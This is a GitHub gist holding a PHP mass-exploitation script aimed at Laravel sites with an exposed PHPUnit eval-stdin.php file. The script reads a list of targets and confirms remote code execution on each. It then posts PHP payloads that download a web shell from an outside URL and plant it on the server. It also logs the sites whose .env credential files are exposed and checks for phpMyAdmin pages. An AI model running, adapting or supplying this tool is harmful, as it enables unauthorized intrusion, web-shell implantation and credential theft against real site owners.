Last active
January 17, 2020 08:14
-
-
Save zelsaddr/1efd54b5957dd203fb0254b7925c7e47 to your computer and use it in GitHub Desktop.
laravel eval stdin exploiter & env checker
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
error_reporting(0); | |
#LARAVEL EXPLOITER v1# | |
# BY FB/www.zeldin.go.id [ SECURITY GHOST ] # | |
define("SAVED_FILE", "envscanner".uniqid().".txt"); | |
function test($site, $test = 1){ | |
switch($test){ | |
case 1 : | |
$postFields = "<?php echo('vuln'); ?>"; | |
break; | |
case 2 : | |
$postFields = "<?php copy('https://raw.githubusercontent.com/rintod/ninja/master/ninja.php', 'ninja.php'); ?>"; | |
break; | |
case 3 : | |
$postFields = "<?php file_put_contents('ninja.php', 'https://raw.githubusercontent.com/rintod/ninja/master/ninja.php'); ?>"; | |
break; | |
default : | |
$postFields = "<?php copy('https://raw.githubusercontent.com/rintod/ninja/master/ninja.php', 'ninja.php'); ?>"; | |
break; | |
} | |
$ch = curl_init(); | |
$options = array( | |
CURLOPT_URL => $site, | |
CURLOPT_RETURNTRANSFER => true, | |
CURLOPT_POST => true, | |
CURLOPT_POSTFIELDS => $postFields, | |
CURLOPT_USERAGENT => "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0", | |
CURLOPT_SSL_VERIFYPEER => false, | |
CURLOPT_SSL_VERIFYHOST => false, | |
CURLOPT_CONNECTTIMEOUT => 7, | |
CURLOPT_TIMEOUT => 7 | |
); | |
curl_setopt_array($ch, $options); | |
return curl_exec($ch); | |
} | |
function get_http_response_code($domain1) { | |
$headers = get_headers($domain1); | |
return substr($headers[0], 9, 3); | |
} | |
function env($site){ | |
preg_match('#(.*)vendor#si', $site, $url); | |
$check = get_http_response_code($url[1].".env"); | |
return $check; | |
} | |
function uri($site){ | |
preg_match('#(.*?)vendor#si', $site, $url); | |
return $url; | |
} | |
echo "# LIST : "; $flist = trim(fgets(STDIN)); | |
if(!is_file($flist) || !file_exists($flist)){ | |
die("No url file list\n"); | |
} | |
$list = explode("\r\n", file_get_contents($flist)); | |
foreach($list as $key => $target){ | |
if(strlen($target) > 0 && strpos($target, 'vendor')){ | |
$site = explode('/', $target)[2]; | |
echo ">>>>>>>>>> START [ ".$key." ] EXPLOITER <<<<<<<<<\n"; | |
echo "\t>> TARGET : ".$site."\n"; | |
echo "\t>> SCANNING TARGET HAS AN RCE FILE OR NOT : "; | |
if(get_http_response_code(uri($target)[0]."/phpunit/phpunit/src/Util/PHP/eval-stdin.php") == 200){ | |
echo "{!} RCE FILE AVAILABLE {!}\n"; | |
echo "\t{!} START TESTING {!} \n"; | |
sleep(2); | |
echo "\t>> TESTING VULN MESSAGE\n"; | |
echo "\t>> RESULT : "; | |
if(test(uri($target)[0]."/phpunit/phpunit/src/Util/PHP/eval-stdin.php", 1) == "vuln"){ | |
echo "VULN\n"; | |
echo "\t>> SITE SHELL CHECK : ".uri($target)[0]."/phpunit/phpunit/src/Util/PHP/ninja.php"."\n"; | |
echo "\t>> TESTING WITH COPY EXTENSION WEBSHELL & CHECK\n"; | |
test(uri($target)[0]."/phpunit/phpunit/src/Util/PHP/eval-stdin.php", 2); | |
echo "\t>> HTTP CODE : ".get_http_response_code(uri($target)[0]."/phpunit/phpunit/src/Util/PHP/ninja.php")."\n"; | |
echo "\t>> TESTING WITH FILE PUT CONTENTS FUNCTION & CHECK\n"; | |
test(uri($target)[0]."/phpunit/phpunit/src/Util/PHP/eval-stdin.php", 3); | |
echo "\t>> HTTP CODE : ".get_http_response_code(uri($target)[0]."/phpunit/phpunit/src/Util/PHP/ninja.php")."\n"; | |
}else{ | |
echo "NOT VULN\n"; | |
} | |
}else{ | |
echo "{~} RCE FILE NOT AVAILABLE {~}\n"; | |
} | |
echo "\t>> CHECK HAS A ENV FILE OR NOT\n"; | |
preg_match('#(.*)vendor#si', $target, $url); | |
echo "\t>> ENV CHECK URL : ".$url[1].".env\n"; | |
echo "\t>> RESULT : "; | |
if(env($target) == "200"){ | |
file_put_contents(SAVED_FILE, $url[1].".env\n", FILE_APPEND); | |
echo $site." [ HAS ENV ]\n"; | |
echo "\t>> CHECK PHPMYADMIN PAGE : "; | |
echo get_http_response_code("http://".$site."/phpmyadmin/") == "200" ? "HAS PHPMYADMIN PAGE\n" : "PHPMYADMIN PAGE NOT FOUND\n"; | |
}else{ | |
echo $site." [ ENV NOT FOUND ]\n"; | |
} | |
echo ">>>>>>>>>>>>>>>>>>> DONE <<<<<<<<<<<<<<<<<<<\n\n"; | |
}else{ | |
$site = explode('/', $target)[2]; | |
echo ">> SKIPPING SITE : ".$site." ~ REASON : VENDOR URL NOT DETECTED.\n"; | |
} | |
sleep(1); | |
} | |
?> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment